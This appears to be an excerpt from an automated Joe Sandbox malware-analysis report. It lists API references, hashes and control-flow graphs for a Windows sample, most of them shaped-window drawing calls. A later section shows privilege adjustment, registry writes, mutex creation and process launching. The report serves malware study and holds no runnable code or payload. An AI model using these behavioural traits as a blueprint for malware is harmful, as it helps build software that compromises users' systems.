                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acc360b84631b74d09ec7f062f2a1d47c7bcd5af942b88cc679ddd779a74eb1b
                                                                        • Instruction ID: 8d98cc9105d08355b1cf810246b7ffd1097ed42400f6c35155de0d25e350e30d
                                                                        • Opcode Fuzzy Hash: acc360b84631b74d09ec7f062f2a1d47c7bcd5af942b88cc679ddd779a74eb1b
                                                                        • Instruction Fuzzy Hash: ECB1036544E7C19FD7438B7888B58927FB0AE1761470E49DBC4C0CF4A3E1096A6EEB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52e45d8e796135177c14e507d8781eb3042a1784119a1155e8e3137822a8891d
                                                                        • Instruction ID: c7793d7827e5b5fadcbc3373e352903320769f94b33e024badf77ecf4e6e1933
                                                                        • Opcode Fuzzy Hash: 52e45d8e796135177c14e507d8781eb3042a1784119a1155e8e3137822a8891d
                                                                        • Instruction Fuzzy Hash: 1391136108E7C19FD7538B7888B58927FF0AE1764470E49DBC4C08F4A3D219696EEB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

APIs
• CopyRect.USER32(?,004384C8), ref: 00405316
• CopyRect.USER32(?,004384C8), ref: 0040533E
  • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
  • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
  • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
  • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
  • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
  • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
• CopyRect.USER32(?,004384C8), ref: 0040535E
  • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
• CopyRect.USER32(?,004384C8), ref: 0040537E
• CopyRect.USER32(?,004384C8), ref: 0040539E
• CopyRect.USER32(?,004384C8), ref: 004053BE
• CopyRect.USER32(?,004384C8), ref: 004053DE
• CopyRect.USER32(?,004384C8), ref: 004053FE
• CopyRect.USER32(?,004384C8), ref: 0040541E
• CopyRect.USER32(?,004384C8), ref: 0040543E
• CopyRect.USER32(?,004384C8), ref: 0040545E
• CopyRect.USER32(?,004384C8), ref: 0040547E
• CopyRect.USER32(?,004384C8), ref: 0040549E
• CopyRect.USER32(?,004384C8), ref: 004054BE
• CopyRect.USER32(?,004384C8), ref: 004054DE
• CopyRect.USER32(?,004384C8), ref: 004054FE
• CopyRect.USER32(?,004384C8), ref: 0040551E
• CopyRect.USER32(?,004384C8), ref: 0040553E
• CopyRect.USER32(?,004384C8), ref: 0040555E
• CopyRect.USER32(?,004384C8), ref: 0040557E
• CopyRect.USER32(?,004384C8), ref: 0040559E
• CopyRect.USER32(?,004384C8), ref: 004055BE
• CopyRect.USER32(?,004384C8), ref: 004055DE
• CopyRect.USER32(?,004384C8), ref: 004055FE
• CopyRect.USER32(?,004384C8), ref: 0040561E
• CopyRect.USER32(?,004384C8), ref: 0040563E
• CopyRect.USER32(?,004384C8), ref: 0040565E
• CopyRect.USER32(?,004384C8), ref: 0040567E
• CopyRect.USER32(?,004384C8), ref: 0040569E
• CopyRect.USER32(?,004384C8), ref: 004056BE
• CopyRect.USER32(?,004384C8), ref: 004056DE
• CopyRect.USER32(?,004384C8), ref: 004056FE
• CopyRect.USER32(?,004384C8), ref: 0040571E
• CopyRect.USER32(?,004384C8), ref: 0040573E
• CopyRect.USER32(?,004384C8), ref: 0040575E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
Similarity
• API ID: CopyRect$CreatePolygon$Combine_ftol
• String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
• API String ID: 3890769595-821843137
• Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
• Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
• Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
• Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CopyRect.USER32(?,004384C8), ref: 00404ED6
  • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
• CopyRect.USER32(?,004384C8), ref: 00404F10
Strings
Memory Dump Source
• Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
Similarity
• API ID: CopyRect$_ftol
• String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
• API String ID: 1144628616-677921438
• Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
• Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
• Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
• Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
Similarity
• API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
• String ID:
• API String ID: 801014965-0
• Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
• Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
• Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
• Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• _ftol.MSVCRT ref: 0040450A
• _ftol.MSVCRT ref: 00404538
• CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
• CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
• CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
• CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
• CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
Memory Dump Source
• Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
Similarity
• API ID: CreatePolygon$Combine_ftol
• String ID:
• API String ID: 2242366081-0
• Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
• Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
• Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
• Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• _ftol.MSVCRT ref: 00403F95
• _ftol.MSVCRT ref: 00403FBF
• CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
• CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
• CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
• CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
• CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
Memory Dump Source
• Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
Similarity
• API ID: CreatePolygon$Combine_ftol
• String ID:
• API String ID: 2242366081-0
• Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
• Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
• Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
• Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1466 40a940-40a999 GetWindowRect 1467 40aa54-40aa7e ClientToScreen call 40b08a 1466->1467 1468 40a99f-40a9a0 1466->1468 1470 40aa83-40aabc call 40adcc 1467->1470 1468->1470 1471 40a9a6-40a9a8 1468->1471 1472 40a9b2-40a9e6 call 4052c0 _ftol 1471->1472 1473 40a9aa-40a9ac 1471->1473 1472->1470 1478 40a9ec-40a9f1 1472->1478 1473->1470 1473->1472 1478->1470 1479 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1478->1479 1486 40aa4d call 40a440 1479->1486 1487 40aa52 1486->1487 1487->1470
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3564110013-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:12.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:9.5%
                                                                        Total number of Nodes:63
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 1673 b8a99a 1674 b8a9c6 FindCloseChangeNotification 1673->1674 1675 b8aa07 1673->1675 1676 b8a9d4 1674->1676 1675->1674 1677 b8ae5a 1678 b8ae92 CreateFileW 1677->1678 1680 b8aee1 1678->1680 1753 b8a67b 1754 b8a6ae LookupPrivilegeValueW 1753->1754 1756 b8a6fe 1754->1756 1681 b8a2fe 1682 b8a32a SetErrorMode 1681->1682 1684 b8a353 1681->1684 1683 b8a33f 1682->1683 1684->1682 1737 b8af30 1738 b8af72 GetFileType 1737->1738 1740 b8afd4 1738->1740 1721 b8ab92 1724 b8abc6 CreateMutexW 1721->1724 1723 b8ac41 1724->1723 1733 b8a2d2 1734 b8a2d6 SetErrorMode 1733->1734 1736 b8a33f 1734->1736 1725 b8a893 1727 b8a89d AdjustTokenPrivileges 1725->1727 1728 b8a91b 1727->1728 1745 b8aa15 1746 b8aa46 NtQuerySystemInformation 1745->1746 1748 b8aa90 1746->1748 1693 b8a8ca 1696 b8a8f9 AdjustTokenPrivileges 1693->1696 1695 b8a91b 1696->1695 1757 b8a960 1758 b8a99a FindCloseChangeNotification 1757->1758 1760 b8a9d4 1758->1760 1761 b8a361 1762 b8a392 RegQueryValueExW 1761->1762 1764 b8a41b 1762->1764 1701 b8b102 1704 b8b137 WriteFile 1701->1704 1703 b8b169 1704->1703 1729 b8b0e2 1731 b8b102 WriteFile 1729->1731 1732 b8b169 1731->1732 1765 b8a462 1767 b8a486 RegSetValueExW 1765->1767 1768 b8a507 1767->1768 1741 b8ae23 1742 b8ae5a CreateFileW 1741->1742 1744 b8aee1 1742->1744 1749 b8b304 1752 b8b326 ShellExecuteExW 1749->1752 1751 b8b368 1752->1751 1709 b8abc6 1710 b8abfe CreateMutexW 1709->1710 1712 b8ac41 1710->1712 1713 b8b326 1716 b8b34c ShellExecuteExW 1713->1716 1715 b8b368 1716->1715 1717 b8aa46 1718 b8aa7b NtQuerySystemInformation 1717->1718 1719 b8aaa6 1717->1719 1720 b8aa90 1718->1720 1719->1718

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 342 b8a893-b8a8f7 346 b8a8f9 342->346 347 b8a8fc-b8a90b 342->347 346->347 348 b8a90d-b8a92d AdjustTokenPrivileges 347->348 349 b8a94e-b8a953 347->349 352 b8a92f-b8a94b 348->352 353 b8a955-b8a95a 348->353 349->348 353->352
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
